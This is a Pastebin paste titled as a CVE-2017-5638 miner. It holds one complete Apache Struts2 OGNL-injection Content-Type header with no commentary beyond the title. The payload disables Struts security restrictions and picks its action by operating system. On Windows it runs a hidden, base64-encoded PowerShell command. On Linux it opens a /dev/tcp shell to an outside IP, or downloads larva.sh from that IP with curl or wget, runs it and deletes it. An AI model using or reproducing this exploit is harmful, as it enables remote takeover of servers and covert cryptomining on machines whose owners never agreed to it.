ankit_anubhav

CVE-2017-5638 Windows+Linux miner

Feb 15th, 2018
514
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.10 KB | None | 0 0
  1. Content-Type: %{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#wcmd="C:\\\"Windows\\\"System32\\\"WindowsPowerShell\\\"v1.0\\\"powershell.exe -WindowStyle Hidden -encode JABlAD0AJwBLAEEAQQBtAEEAQwBnAEEASQBnAEIANwBBAEQARQBBAGYAUQBCADcAQQBEAEkAQQBmAFEAQgA3AEEARABBAEEAZgBRAEEAaQBBAEMAMABBAFoAZwBBAGcAQQBDAGMAQQBaAFEAQgBqAEEASABRAEEASgB3AEEAcwBBAEMAYwBBAFQAZwBCAGwAQQBIAGMAQQBKAHcAQQBzAEEAQwBnAEEASQBnAEIANwBBAEQARQBBAGYAUQBCADcAQQBEAEEAQQBmAFEAQQBpAEEAQwBBAEEATABRAEIAbQBBAEMAYwBBAGEAZwBBAG4AQQBDAHcAQQBKAHcAQQB0AEEARQA4AEEAWQBnAEEAbgBBAEMAawBBAEsAUQBBAGcAQQBDAGcAQQBJAGcAQgA3AEEARABFAEEAZgBRAEIANwBBAEQASQBBAGYAUQBCADcAQQBEAE0AQQBmAFEAQgA3AEEARABRAEEAZgBRAEIANwBBAEQAQQBBAGYAUQBBAGkAQQBDADAAQQBaAGcAQQBnAEEAQwBjAEEAYgBnAEIAMABBAEMAYwBBAEwAQQBBAG4AQQBGAE0AQQBKAHcAQQBzAEEAQwBnAEEASQBnAEIANwBBAEQARQBBAGYAUQBCADcAQQBEAEEAQQBmAFEAQQBpAEEAQwBBAEEATABRAEIAbQBBAEMAYwBBAGQAQQBCAGwAQQBDAGMAQQBMAEEAQQBuAEEASABrAEEAYwB3AEEAbgBBAEMAawBBAEwAQQBBAG8AQQBDAEkAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeQBBAEgAMABBAGUAdwBBAHgAQQBIADAAQQBJAGcAQQB0AEEARwBZAEEASgB3AEIAdABBAEMAYwBBAEwAQQBBAG4AQQBHAFUAQQBZAGcAQgBEAEEARwB3AEEAYQBRAEEAbgBBAEMAdwBBAEoAdwBBAHUAQQBFADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEEAbgBBAEMAawBBAEwAQQBBAG4AQQBHAFUAQQBKAHcAQQBwAEEAQwBrAEEATABnAEEAbwBBAEMASQBBAGUAdwBBAHgAQQBIADAAQQBlAHcAQQB6AEEASAAwAEEAZQB3AEEAeQBBAEgAMABBAGUAdwBBAHcAQQBIADAAQQBJAGcAQQBnAEEAQwAwAEEAWgBnAEEAZwBBAEMAZwBBAEkAZwBCADcAQQBEAEUAQQBmAFEAQgA3AEEARABBAEEAZgBRAEIANwBBAEQASQBBAGYAUQBBAGkAQQBDAEEAQQBMAFEAQgBtAEEAQwBjAEEAZABBAEIAeQBBAEcAawBBAEoAdwBBAHMAQQBDAGMAQQBZAFEAQgBrAEEARgBNAEEASgB3AEEAcwBBAEMAYwBBAGIAZwBCAG4AQQBDAGMAQQBLAFEAQQBzAEEAQwBjAEEAUgBBAEEAbgBBAEMAdwBBAEsAQQBBAGkAQQBIAHMAQQBNAFEAQgA5AEEASABzAEEATQBBAEIAOQBBAEMASQBBAEkAQQBBAHQAQQBHAFkAQQBKAHcAQgB1AEEARwB3AEEAYgB3AEEAbgBBAEMAdwBBAEoAdwBCADMAQQBDAGMAQQBLAFEAQQBzAEEAQwBjAEEAYgB3AEEAbgBBAEMAawBBAEwAZwBBAGkAQQBHAGsAQQBZAEEAQgBPAEEARgBZAEEAVAB3AEIAZwBBAEUAcwBBAFoAUQBBAGkAQQBDAGcAQQBLAEEAQQBpAEEASABzAEEATQBBAEIAOQBBAEgAcwBBAE4AQQBCADkAQQBIAHMAQQBNAHcAQgA5AEEASABzAEEATQBnAEIAOQBBAEgAcwBBAE4AUQBCADkAQQBIAHMAQQBNAFEAQgA5AEEAQwBJAEEATABRAEIAbQBBAEMAQQBBAEsAQQBBAGkAQQBIAHMAQQBNAEEAQgA5AEEASABzAEEATQBRAEIAOQBBAEMASQBBAEkAQQBBAHQAQQBHAFkAQQBKAHcAQgBvAEEASABRAEEAZABBAEEAbgBBAEMAdwBBAEoAdwBCAHcAQQBEAG8AQQBKAHcAQQBwAEEAQwB3AEEASgB3AEIAdwBBAEgATQBBAE0AUQBBAG4AQQBDAHcAQQBKAHcAQQAzAEEARwBvAEEASgB3AEEAcwBBAEMAYwBBAFoAUQBCAHQAQQBHAFUAQQBKAHcAQQBzAEEAQwBnAEEASQBnAEIANwBBAEQAQQBBAGYAUQBCADcAQQBEAEUAQQBmAFEAQQBpAEEAQwAwAEEAWgBnAEEAbgBBAEMAOABBAEwAdwBCADMAQQBIAGMAQQBkAHcAQQB1AEEAQwBjAEEATABBAEEAbgBBAEcAVQBBAEoAdwBBAHAAQQBDAHcAQQBLAEEAQQBpAEEASABzAEEATQBBAEIAOQBBAEgAcwBBAE0AUQBCADkAQQBDAEkAQQBMAFEAQgBtAEEAQwBBAEEASgB3AEEAdQBBAEgAYwBBAGEAUQBCAHUAQQBDADgAQQBjAHcAQgBqAEEAQwBjAEEATABBAEEAbgBBAEgAWQBBAEwAZwBBAG4AQQBDAGsAQQBLAFEAQQBwAEEASAB3AEEATABnAEEAbwBBAEMASQBBAGUAdwBBAHgAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEASQBnAEEAdABBAEcAWQBBAEoAdwBCAGwAQQBIAGcAQQBKAHcAQQBzAEEAQwBjAEEAYQBRAEEAbgBBAEMAawBBACcAOwAgAHMAdABhAHIAdAAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgACcALQBlAG4AYwBvAGQAZQAnACwAIAAkAGUAIAAgACAA").(#lcmd="nohup sh -c '(sh < /dev/tcp/149.255.35.91/23546 > /dev/null || curl -s http://149.255.35.91/larva.sh|sh > /dev/null || wget http://149.255.35.91/larva.sh -O /var/tmp/larva.sh) && chmod +x /var/tmp/larva.sh && (nohup /var/tmp/larva.sh &) && sleep 1 && rm -f /var/tmp/larva.sh' &").(#iswin=(@java.lang.System@getProperty("os.name").toLowerCase().contains("win"))).(#cmds=(#iswin?{"cmd.exe","/c",#wcmd}:{"/bin/bash","-c",#lcmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(" ok5026 ".getBytes())).(#ros.flush())}
Add Comment
Please, Sign In to add comment